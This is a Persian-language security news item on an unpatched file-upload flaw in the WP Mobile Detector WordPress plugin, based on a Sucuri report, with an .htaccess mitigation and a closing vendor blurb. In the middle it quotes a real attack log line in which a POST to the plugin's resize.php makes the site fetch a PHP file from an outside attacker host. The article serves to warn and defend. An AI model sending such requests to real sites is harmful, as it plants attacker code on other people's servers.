آسیب‌پذیری در افزونه آشکارساز تلفن همراه در وردپرس

متخصصان امنیتی Sucuri گزارش دادند که تعداد رو به رشدی از نصب‌های وردپرس توسط مهاجمان به خطر افتاده است که از حفره‌ی امنیتی در یک افزونه رایج به نام آشکارساز تلفن همراه WP، سوءاستفاده می‌کنند.
خبر نگران کننده این است که این آسیب پذیری مورد استفاده توسط خرابکاران در دنیای واقعی هنوز بدون وصله باقی مانده است.
طبق گزارش متخصصان Sucuri، مهاجمان عمدتاً از حفره‌ای در افزونه آشکارساز تلفن همراه WP سوءاستفاده می‌کنند تا اسکریپت‌های هرزنامه‌ مربوط به مطالب غیراخلاقی را نصب کنند.
پس از کشف این آسیب‎پذیری، این افزونه از دستورالعمل رسمی افزونه وردپرس حذف شده است.

شرکت Sucuri گزارش داد که: «تیم تحقیقاتی ما شروع به بررسی این خطا کردند و متوجه شدند که فاکتور مشترک در سرتاسر این وب‌گاه‌های وردپرس، افزونه آشکارساز تلفن همراه WP است که پرونده دلخواه روز-صفرمی دارد که آسیب‎پذیری منتشر شده در روز ۳۱ می را بارگذاری می‌کند. از آن موقع این افزونه از وب‌گاه‌ وردپرس حذف شده است و هیچ وصله‎ای هم برای آن موجود نیست. این آسیب‎پذیری در روز ۳۱ می به طور عمومی منتشر شد اما طبق گزارشات دیوار آتش، این حمله از ۲۷ می آغاز شده است».
تخمین زده شده که این افزونه بیش از ۱۰۰۰۰ بار نصب شده است و بیشتر آن‌ها هنوز در برابر حملات سایبری آسیب‌پذیر هستند.

حفره ناشی از ناتوانی افزونه برای تعیین صحت ورودی است و به مهاجمان اجازه تزریق کد مخرب PHP به ورودی‌ها را می‌دهد.
Sucuri در ادامه گفت: «سوءاستفاده از این آسیب‎پذیری بسیار آسان است. همه‎ی چیزی که مهاجم نیاز دارد ارسال یک درخواست به resize.php یا timthumb.php در دستورالعمل افزونه با URL درب پشتی است. مورد زیر یکی از بار داده‎ای است که در دنیای واقعی با آن مواجه شدیم»:

۱۸۸.۷۳.۱۵۲.۱۶۶ – – [۳۱/May/۲۰۱۶:۲۳:۵۴:۴۳ -۰۴۰۰] “POST /wp-content/plugins/wp-mobile-detector/resize.php
Payload:src=hxxp://copia[.]ru/mig/tmp/css.php”

متخصصان تاکید کردند که هیچ وصله‎ای برای این آسیب‎پذیری ارائه نشده‌ است، یعنی اینکه بهتر است کاربران افزونه آشکارساز تلفن همراه WP را غیر فعال کنند.
«به همه شدیداً توصیه می‌کنیم که هم اکنون این افزونه را حذف کنید. اگر هم به این افزونه نیاز دارید، وصله‎ی موقتی برای غیرفعال کردن اجرای PHP در مسیر فرعی wp-mobile-detector/cache وجود دارد که برای مثال از این کد در فایل .htaccess استفاده می‌کند».

<Files *.php>
deny from all
</Files>

منبع: asis

درباره نماد امنیت وب

“نماد امنیت وب” به عنوان یکی از شرکت های پیشتاز در زمینه امنیت نرم افزار و سرویس های تحت وب، با ارائه سرویس های امنیتی برای تمامی کسب و کار ها و دارای نمایندگی شرکت Acunetix (اکوانتیکس) بعنوان محبوب ترین اسکنر امنیتی black box در دنیا، ایمنی وب سایت شما را در مقابل حمله هکر ها تضمین می کند.